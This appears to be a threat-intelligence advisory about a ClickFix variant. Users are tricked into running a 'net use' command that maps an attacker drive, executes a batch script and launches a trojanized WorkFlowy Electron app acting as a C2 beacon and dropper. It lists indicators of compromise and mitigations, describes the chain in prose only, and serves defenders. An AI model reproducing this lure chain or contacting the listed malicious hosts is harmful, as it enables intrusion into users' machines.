Investigating a new Click-fix variant
A new variant of the ClickFix technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. This acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods and utilizes Electron application bundling to hide malicious code.
AI Analysis
Technical Summary
This newly identified ClickFix variant represents an evolution in social engineering and malware delivery tactics. The attack begins by tricking users into pressing Win + R and executing a crafted command that uses 'net use' to map a network drive from an attacker-controlled external server. This mapped drive hosts a malicious batch (.cmd) script that, once executed, downloads a ZIP archive containing a modified version of the legitimate WorkFlowy application. WorkFlowy is an Electron-based app, and the attackers have embedded malicious code within its '.asar' archive, a packaging format used by Electron apps. This embedded code functions as a command-and-control (C2) beacon, enabling communication with attacker infrastructure, and also acts as a dropper to deploy the final malware payload onto the victim's system. The use of Electron app bundling and legitimate software helps the malware evade signature-based detection and behavioral monitoring. The attack chain involves multiple stages: social engineering to initiate execution, network drive mapping to access malicious resources, script execution to download and unpack payloads, and finally, execution of the trojanized Electron app. Indicators of compromise include specific file hashes, IP 144.31.165.173, domains such as cloudflare.report and happyglamper.ro, and URLs linked to the attack. Although no active exploits have been reported in the wild, the technique’s reliance on user execution and its stealthy nature pose a significant risk. The attack leverages several MITRE ATT&CK techniques, including T1204.002 (User Execution), T1059 (Command and Scripting Interpreter), T1140 (Deobfuscate/Decode Files or Information), T1041 (Exfiltration Over C2 Channel), and T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder), among others.
Potential Impact
If successfully executed, this malware variant can lead to unauthorized remote control of infected systems, data exfiltration, and deployment of additional malicious payloads. The use of legitimate software with embedded malicious logic complicates detection and response, potentially allowing attackers to maintain persistence and evade security controls for extended periods. Organizations may face data breaches, intellectual property theft, operational disruption, and reputational damage. The attack requires user interaction, which limits automated spread but increases risk in environments with less security awareness or insufficient endpoint protections. The stealthy nature of the Electron app-based payload and the use of network drive mapping can bypass traditional endpoint detection and network monitoring tools, increasing the likelihood of prolonged undetected compromise. This threat is particularly concerning for organizations relying on Windows environments and those that allow execution of scripts and network drive mappings without strict controls.
Mitigation Recommendations
To mitigate this threat, organizations should implement strict endpoint security policies that restrict execution of scripts and commands via Win + R or other shortcuts, especially those involving network drive mappings. Employ application whitelisting to prevent execution of unauthorized batch files and modified Electron applications. Enhance user awareness training focused on the risks of executing unsolicited commands or scripts, particularly those initiated via social engineering. Monitor and restrict use of 'net use' commands and network drive mappings from untrusted external sources. Deploy advanced endpoint detection and response (EDR) solutions capable of analyzing Electron app behaviors and detecting anomalous '.asar' archive modifications. Regularly audit startup and autostart locations (registry run keys, startup folders) for unauthorized entries. Use network monitoring to detect suspicious communications to known malicious domains and IP addresses such as cloudflare.report and 144.31.165.173. Maintain up-to-date threat intelligence feeds to identify and block indicators of compromise associated with this attack. Finally, restrict user privileges to prevent execution of commands requiring elevated rights and enforce the principle of least privilege.
Affected Countries
United States, Germany, United Kingdom, France, Canada, Australia, Netherlands, Romania
Indicators of Compromise
- hash: 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42
- hash: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063
- hash: dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829
- ip: 144.31.165.173
- url: http://cloudflare.report/forever/e/
- url: https://cloudflare.report/forever/e/
- domain: cloudflare.report
- domain: happyglamper.ro
Investigating a new Click-fix variant
Description
A new variant of the ClickFix technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. This acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods and utilizes Electron application bundling to hide malicious code.
AI-Powered Analysis
Technical Analysis
This newly identified ClickFix variant represents an evolution in social engineering and malware delivery tactics. The attack begins by tricking users into pressing Win + R and executing a crafted command that uses 'net use' to map a network drive from an attacker-controlled external server. This mapped drive hosts a malicious batch (.cmd) script that, once executed, downloads a ZIP archive containing a modified version of the legitimate WorkFlowy application. WorkFlowy is an Electron-based app, and the attackers have embedded malicious code within its '.asar' archive, a packaging format used by Electron apps. This embedded code functions as a command-and-control (C2) beacon, enabling communication with attacker infrastructure, and also acts as a dropper to deploy the final malware payload onto the victim's system. The use of Electron app bundling and legitimate software helps the malware evade signature-based detection and behavioral monitoring. The attack chain involves multiple stages: social engineering to initiate execution, network drive mapping to access malicious resources, script execution to download and unpack payloads, and finally, execution of the trojanized Electron app. Indicators of compromise include specific file hashes, IP 144.31.165.173, domains such as cloudflare.report and happyglamper.ro, and URLs linked to the attack. Although no active exploits have been reported in the wild, the technique’s reliance on user execution and its stealthy nature pose a significant risk. The attack leverages several MITRE ATT&CK techniques, including T1204.002 (User Execution), T1059 (Command and Scripting Interpreter), T1140 (Deobfuscate/Decode Files or Information), T1041 (Exfiltration Over C2 Channel), and T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder), among others.
Potential Impact
If successfully executed, this malware variant can lead to unauthorized remote control of infected systems, data exfiltration, and deployment of additional malicious payloads. The use of legitimate software with embedded malicious logic complicates detection and response, potentially allowing attackers to maintain persistence and evade security controls for extended periods. Organizations may face data breaches, intellectual property theft, operational disruption, and reputational damage. The attack requires user interaction, which limits automated spread but increases risk in environments with less security awareness or insufficient endpoint protections. The stealthy nature of the Electron app-based payload and the use of network drive mapping can bypass traditional endpoint detection and network monitoring tools, increasing the likelihood of prolonged undetected compromise. This threat is particularly concerning for organizations relying on Windows environments and those that allow execution of scripts and network drive mappings without strict controls.
Mitigation Recommendations
To mitigate this threat, organizations should implement strict endpoint security policies that restrict execution of scripts and commands via Win + R or other shortcuts, especially those involving network drive mappings. Employ application whitelisting to prevent execution of unauthorized batch files and modified Electron applications. Enhance user awareness training focused on the risks of executing unsolicited commands or scripts, particularly those initiated via social engineering. Monitor and restrict use of 'net use' commands and network drive mappings from untrusted external sources. Deploy advanced endpoint detection and response (EDR) solutions capable of analyzing Electron app behaviors and detecting anomalous '.asar' archive modifications. Regularly audit startup and autostart locations (registry run keys, startup folders) for unauthorized entries. Use network monitoring to detect suspicious communications to known malicious domains and IP addresses such as cloudflare.report and 144.31.165.173. Maintain up-to-date threat intelligence feeds to identify and block indicators of compromise associated with this attack. Finally, restrict user privileges to prevent execution of commands requiring elevated rights and enforce the principle of least privilege.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variant"]
- Adversary
- null
- Pulse Id
- 69b7db3dcc28a49fbcbad5df
- Threat Score
- null
Indicators of Compromise
Hash
| Value | Description | Copy |
|---|---|---|
hash9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 | — | |
hasha390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 | — | |
hashdc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip144.31.165.173 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://cloudflare.report/forever/e/ | — | |
urlhttps://cloudflare.report/forever/e/ | — |
Domain
| Value | Description | Copy |
|---|---|---|
domaincloudflare.report | — | |
domainhappyglamper.ro | — |
Threat ID: 69b7e3e19d4df45183505ada
Added to database: 3/16/2026, 11:05:05 AM
Last enriched: 3/16/2026, 11:21:18 AM
Last updated: 3/16/2026, 9:37:59 PM
Views: 44
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.